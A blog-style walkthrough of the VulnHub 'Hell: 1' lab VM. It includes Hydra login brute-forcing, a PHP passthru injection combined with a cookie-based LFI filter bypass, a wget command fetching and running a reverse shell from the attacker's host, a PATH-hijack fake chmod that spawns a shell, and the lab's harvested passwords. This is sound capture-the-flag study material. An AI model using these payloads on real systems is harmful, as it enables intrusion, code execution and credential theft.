published on in writeup
tags: hell

Hell: 1 - Part 1

Hell is the latest installment of evil hosted on VulnHub, and is the devil child of Peleus. To say it’s a difficult and lengthy challenge will not prepare you for the torture…

This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts!

Nmap

[email protected]:~# nmap -n -p- -A 192.168.127.102
 
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f4:bb:f4:22:36:08:61:ef:74:2c:27:e0:b4:a2:69:d3 (DSA)
|   2048 0e:31:1d:cf:04:d0:63:fa:5c:76:f2:dc:22:1c:f1:7c (RSA)
|_  256 e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa (ECDSA)
80/tcp    open     http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/personal/ /super_secret_login_path_muhahaha/
|_http-title: Have fun!
111/tcp   open     rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35027/udp  status
|_  100024  1          40080/tcp  status
666/tcp   open     doom?
1337/tcp  filtered waste
40080/tcp open     status  1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35027/udp  status
|_  100024  1          40080/tcp  status
1 service unrecognized despite returning data.

Apache

Popping over to port 80 in a web browser, gives you a page with the following text:

Welcome to Hell
Our admin Jack is still busy coding up the site, but in the mean time - have a comic...
All credit goes to Cyanide and Happiness at explosm.net.
Hopefully by the end of the challenge you'll be experiencing one or the other of those things.
I wonder what's on the gateway to hell? (Port 666 obv)

Without going into too much detail, the service on port 666 seemed to be a deadend to me so I continued to enumerate the apache service.

There are two entries in robots.txt:

/personal/
/super_secret_login_path_muhahaha/

The personal directory contains a rather… disturbing show of affection for the founder of VulnHub (and all round good guy), g0tmi1k.

The super_secret directory contains a login page.

I tried a few combinations of admin/jack and g0tmi1k, but was unsuccessful. There is no SQLi that I was able to find either.

Peleus hints on the VulnHub desription for the challenge, that some techniques required to root this VM can be found on his own blog. He has a good post regarding wordlists, which includes using custom word mangling rules for john.

I used the information to create a new mangled password list based on g0tmi1k and ran it again through hydra. This time I got a hit.

[email protected]:~/hell# hydra 192.168.127.128 http-form-post "/super_secret_login_path_muhahaha/login.php:username=^USER^ password=^PASS^ mysubmit=Login:Failed" -l jack -P wordlist-mangled
 
[80][www-form] host: 192.168.127.128   login: jack   password: g0tmi1k69

Hmm… 69, this just gets weirder and weirder…

On the otherside of this login there are image links which take you to a bunch of different pages (some with amusing GIFs).

The Personal Folder links you to another login page.

When you try an incorrect login you get a countdown.

And when you reach 3 failed attempts, a large intruder alert message appears and you can no longer access any of the pages. You must clear your cookies to try again.

These two aspects are tracked with cookies: failcount=3; intruder=1;

There is also the Notes page, which appears to write any input to a file called note.txt. Infering from the text on the page, we can assume its being stored in /tmp/note.txt.

Believe me… I’m going somewhere with all this…

Carrying out some filename bruteforcing in the super_secret directory, reveals that the HTML for the Intruder message is within a file called 1. So the intruder=1; cookie is actually calling a file. You can verify this by modying the cookie to include a different file, e.g. index.php.

Also, the failcount=; cookie is unsanitised, so you can modify this to be any value. Putting all this together, we have some handy php injection!

LFI, PHP Injection

First, I injected the following PHP code into /tmp/note.txt, via notes.php: <?php passthru($_COOKIE['failcount']); ?>.

This will take the input from the failcount cookie and execute it with the php passthru function.

I then refreshed panel.php and modified the cookies accordingly. Note that there is some filtering on the intruder cookie - it seems to remove instances of ../, which obviously made including /tmp/note.txt difficult as you can’t use absolute paths either. There are a couple of ways around this - mine was to do ..././. The filter removes the instance of ../ in the middle but the characters on either side just come together to form a new ../. The filtering does not loop which allows this to work. The same thing can be accomplished using ...// and so on…

So:

GET /super_secret_login_path_muhahaha/panel.php
Cookie: 1405281617=; failcount=id; intruder=..././..././..././tmp/note.txt; PHPSESSID=u01geguamj2jakpin0vlm2peb4
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I was then able to use this code execution to upload and execute a reverse shell (msfpayload).

wget%20http%3A%2F%2F192.168.127.127%2Fshell%20-O%20%2Ftmp%2Fshell%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fshell%20%26%26%20%2Ftmp%2Fshell

Jack

With shell access as www-data, I was able to read the login.php file in the super_secret directory.

// mysql_connect("127.0.0.1", "Jack", "zgcR6mU6pX") or die ("Server Error");
I'll change this back once development is done. Got sick of typing my password.
mysql_connect("127.0.0.1", "www-data", "website") or die("Server Error");

You can log into the MySQL DB with the www-data credentials, but there’s nothing more to see. The commented out password can be used to SSH into Hell as Jack.

Within his home directory is a folder called g0tmi1k_pics containing yet more disturbing pictures, but there’s nothing hidden in the images as far as I can tell.

There is also a hidden directory called .pgp.

-rwx------ 1 jack jack   39 Jun 18 12:35 note
-rwx------ 1 jack jack 1802 Jun 18 12:20 pgp.priv
-rwx------ 1 jack jack  890 Jun 18 12:24 pgp.pub
 
[email protected]:~$ cat .pgp/note
The usual password as with everything.

After some enumeration I found the following file, a PGP encrypted email.

[email protected]:~$ file /var/mail/jack/received/message.eml
/var/mail/jack/received/message.eml: PGP message

Import the key, then decrypt the messge.

[email protected]:~/.pgp$ gpg --import pgp.priv
[email protected]:~/.pgp$ gpg -d /var/mail/jack/received/message.eml 

You need a passphrase to unlock the secret key for
user: "jack @ cowlovers.com"
2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
 
Enter passphrase: g0tmi1k69
 
Ok Jack. I've created the account 'milk_4_life' as per your request. Please stop emailing me about this now or I'm going to talk to HR like we discussed.
 
The password is '4J0WWvL5nS'

milk_4_life

With SSH access as milk_4_life, some proper work begins.

Within his home directory is a binary file called game, which seems to be a small wrapper around /usr/bin/game.py. When you run the file, all you see is the message I'm Listening. Netstat or netcat are not installed, but there are some alternatives that can be used.

Using ss -lp, we can see that it’s listening on the loopback on port 1337 and we can use telnet to interact with it.

[email protected]:~$ telnet 127.0.0.1 1337
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Type 'START' to begin
 
da easy crew
No... START. S-T-A-R-T
 
START
Starting...
 
You have 30 seconds to get as many points as you can, beat the high score! (High Score: 133723)
 
Quick what's... 696 x 928?

There didn’t seem to be any vulnerabilities such as buffer overflows in the inputs, so let’s try and beat the game! This reminded me a little of Chuckles’ game of single syllable’s in Ultima VII… Every time you get a correct answer your score goes up, but it’s a pretty hefty score to beat in 30 seconds.

Realistically, the only way to win is to write an automated script. All that’s required is to read the input of each question, split it to obtain the two numbers, make the calculation and send the answer back (all on a loop), chuckles.py.

#!/usr/bin/env python
 
import socket
import re
 
target = '127.0.0.1'
port = 1337
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
s.connect((target, port))
s.recv(1024)
s.send('START\n')
s.recv(1024)
 
while True:
 
        data = s.recv(1024)
        line = re.findall(r"Quick what's... (.*?)\?", data)
 
        if not line:
 
                print data
                break
 
        (a,b) = line[0].split(' x ')
 
        mul = int(a) * int(b)
        print str(data)  + str(mul)
        s.send(str(mul)+'\n')
 
print s.recv(1024)
s.close()
[email protected]:~$ ./chuckles.py 
[...snip...]
Final Score: 397261
!*!*!*!*! Congratulations, new high score (397261) !*!*!*!*!
 
I hear the faint sound of chmodding.......

This implies that when you win the game, a file permission is changed. Unfortunately it’s not helpful enough to tell us which one. It’s logical to assume that because the owner of game is george, then any modification it makes must also be to a file owned by george.

[email protected]:~$ find / -user george 2>/dev/null 
/home/milk_4_life/game
/home/george
/usr/bin/game.py
/usr/bin/lesson101
/var/mail/george
/var/mail/george/signup.eml

---x--x--x 1 george george 6531 Jun 19 15:13 /usr/bin/lesson101          <-- before
---s--x--x 1 george george 6531 Jun 19 15:13 /usr/bin/lesson101          <-- after

My brief investigation into this binary showed that there may a buffer overflow in the Name field (after you correctly guess the numer in fewer than 3 guesses). However, I was able to gain access as george through a slightly different route. The game binary executes a chmod on lesson101, but on a hunch I hoped that the chmod path was not hardcoded in the binary (this was described as a bug in v1 of Hades).

I wrote a simple C program that would run an instance of /bin/sh, compiled it into a binary called chmod and placed it in /tmp. Then place /tmp at the beginning of the environmental path variable and play the game. The binary (with it’s suid bit) executes /tmp/chmod and gives you a shell as George.

chmod.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
        system("/bin/sh -i");
}
[email protected]:/tmp$ gcc chmod.c -o chmod
[email protected]:/tmp$ PATH=/tmp:$PATH
[email protected]:~$ ./game
 
I'm listening
$ id
uid=1002(milk_4_life) gid=1002(milk_4_life) euid=1000(george) groups=1000(george),1002(milk_4_life)

George

This allows you to enter George’s home directory. To give myself persistent access, I created a .ssh directory and echo’d my public SSH key into authorized_keys - this allows me to SSH in as George, without a password. George does have an email (which is readable before now), but contains an interesting reference to the rockyou wordlist.

-rw-r--r-- 1 george george 175 Jun 20 13:06 /var/mail/george/signup.eml
 
From: admin @ rockyou.com

Within his home area is a file called container.rc.

-rw------- 1 george george 4194304 Jun 19 21:09 container.tc

The TC file extension indicates that this is a TrueCrypt encrypted disk - this can be easily decrypted using the NSA backdoor (joke, but probably true :s). I transfered the container to my Windows host, where I have cudaHashcat working, and ran it against the rockyou wordlist. The correct password was found in about 27 seconds.

cudaHashcat64.exe -m 6211 conntainer.tc rockyou.txt
letsyouupdateyourfunnotesandmore

With this, the container can be decrypted and mounted.

[email protected]:~$ truecrypt container.tc
Enter mount directory [default]: /mnt/truecrypt
Enter password for /home/george/container.tc:
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:
 
[email protected]:~$ ls -l /mnt/truecrypt/
-rwx------ 1 george george 1679 Jul  5 20:01 id_rsa